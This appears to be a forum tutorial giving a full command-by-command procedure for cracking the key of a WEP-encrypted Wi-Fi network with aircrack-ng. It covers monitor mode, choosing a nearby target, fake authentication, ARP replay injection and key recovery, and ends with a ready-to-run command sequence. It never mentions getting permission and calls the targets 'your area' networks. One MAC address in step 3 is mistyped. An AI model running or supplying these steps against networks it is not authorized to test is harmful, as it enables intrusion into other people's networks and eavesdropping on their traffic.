Simple guide to aquiring key from WEP encrypted network

  • Simple guide to aquiring key from WEP encrypted network
    
    This tutorial is aimed at providing a simple guide to a common, effective, and simple attack on WEP based networks, yielding the WEP key. We will, of course be using tools from the aircrack-ng suite on a Linux operating system with aircrack already installed and running (like backtrack, wifiway, or wifislax). The idea is to capture a large number of IVs (initialization vectors), which have a portion of the WEP key within them. With enough IVs, aircrack can crack the key using the initialization vectors. To generate IVs we will use the "ARP request replay attack". IVs are generated when the access point recieves an ARP (address resolution protocol) packet. An ARP packet is generated when a host want to change it's network address into a physical address. While associated with the access point via a fake authentication, the access point will interact with us, rather than just ignore us. Therefor we can eavesdrop on the network traffic until an ARP packet is caught which, will produce an IV. We can then re-inject this packet over and over generating new IVs at a rapid rate. With a sufficient amount of IVs, they can in turn be used by aircrack-ng to crack the WEP key. The process is simple:
    
    - Place your wireless network card into 'monitor mode'.
    - Enumerate WEP networks in your area, then choose a target.
    - Focus in on the target and create a file to dump all the traffic and captured data into.
    - Conduct a fake authentication with the access point to allow for communication.
    - Start the ARP request replay attack and wait for an ARP packet to be captured and re-injected.
    - Start aircrack-ng to use the captured data to crack the key.
    
    A few pieces of information will be required about your own computer, and the network you are attacking. In this example we will use the following :
    
    OUR INFORMATION:
    - network interface  -------- wlan0, mon0
    - BSSID (MAC address) -- 00:11:22:33:44:55
    
    TARGET INFORMATION:
    - channel ------------------------- 9
    - BSSID (MAC address) ------ d0:df:9a:1e:2e:ec
    - ESSID (access point name) -- NetLinx
    
    We will start with the steps, with explanations. Then we will finish with just the steps, one after the other. Open up a shell, and proceed with these commands:
    
    1 - 
    Place your wireless network card into 'monitor mode'.
    
    >airmon-ng start wlan0
    
    (This will create a new interface, in our case called 'mon0'. 'mon0' will be the interface that is in monitor mode.)
    
    
    2 - 
    enumerate WEP networks in your area, then choose a target.
    
    >airodump-ng --encrypt wep mon0
    
    (This will scan only for networks that are using WEP This is where we gain the channel, ESSID, and BSSID, of our target. The next command will focus airodump onto the target that we are using in this tutorial.)
    
    
    3 - 
    Focus in on the target, and create a file to dump all the traffic and captured data into.
    
    >airodump-ng -c 9 --bssid do:df:9a:1e:2e:ec -w dumpfile mon0
    
    ('-c 9', specifies channel 9. '--bssid', focuses onto the target MAC address. '-w dumpfile', creates a file called 'dumpfile', to store all of our captured data into.) 
    
    
    4 -
    Conduct a 'fake authentication' with the access point, to allow for communication between us and the access point. (open a new shell)
    
    >aireplay-ng --fakeauth 6000 -q 10 -a d0:df:9a:1e:2e:ec -e NetLinx -h 00:11:22:33:44:55 mon0
    
    ('--fakeauth 6000', creates a 'fake authentication', with a delay to re-authenticate every 6000 seconds. This long delay allows for 'keep-alive' packet intervals to be used. '-q', specifies how many seconds to wait between sending 'keep-alive' packets to the access point. '-a', specifies the target MAC address. '-e' specifies the target name (ESSID). '-h' specifies the our MAC address. aireplay will display a status of successful if you indeed are successful at associating with the access point. If you are not yet successful, you will see aireplay retry over and over. You must associate before you move forward. One main cause of an unsuccessful association is being to far away from the access point.) 
    
    
    5 - 
    Start the ARP request replay attack, and wait for an ARP packet to be captured and re-injected. (open a new shell)
    
    >aireplay-ng -3 -b d0:df:9a:1e:2e:ec -h 00:11:22:33:44:55 mon0
    
    ('-3', specifies the 'ARP request replay attack'. '-b', specifies the target MAC address. '-h', specifies our MAC address.  After a while you should capture an ARP packet and the re-injection will begin automatically. If this works successfully, you will see the number under the 'data' section in airodump increase rapidly, if so proceed to the final step)
    
    
    6 -
    Start aircrack-ng and use the captured data file to crack the WEP key. (open a new shell)
    
    >aircrack-ng dumpfile*.cap
    
    (This will run aircrack-ng, and use the capture file created by airodump-ng to provide the data aircrack will use to crack the key. If it fails, it will retry every 5000 IV capture incrementation until it does crack the key.)
    
    
    Now here are the commands one after the other:
    
    >airmon-ng start wlan0
    >airodump-ng --encrypt wep mon0
    >airodump-ng -c 9 --bssid d0:df:9a:1e:2e:ec -w dumpfile mon0
    >aireplay-ng --fakeauth 6000 -q 10 -a d0:df:9a:1e:2e:ec -e NetLinx -h 00:11:22:33:44:55 mon0 (in a new shell)
    >aireplay-ng -3 -b d0:df:9a:1e:2e:ec -h 00:11:22:33:44:55 mon0 (in a new shell)
    >aircrack-ng dumpfile*.cap (in a new shell)
    
    Conclusion
    All in all this could take anywhere from 5 minutes to perhaps even hours if you are barely within range. The longest it's ever taken me is about half an hour, but the shortest it's taken me was only about 3 minutes. I think the range is the most significant factor here, and if anything fails due to your range, it will probably be the fake authentication. If you just cannot seem to authenticate, this is a good indicator that you are just not quite close enough. There are many many WEP attacks in play and is still a growing field of study so long as it will be in use. This attack is a good way to grasp the concepts and get used to the feel of wireless hacking as you progress through the steps and watch the pieces come together first hand, which is the general purpose of this tutorial. An in-depth, yet simple guide to help begin the spark that i felt when I was successful for the first time, which pushed my ambition to learn more, even harder and faster. So thanx for reading and please comment if you want, or would like to talk about other wireless topics or more specific WEP topics, and good luck.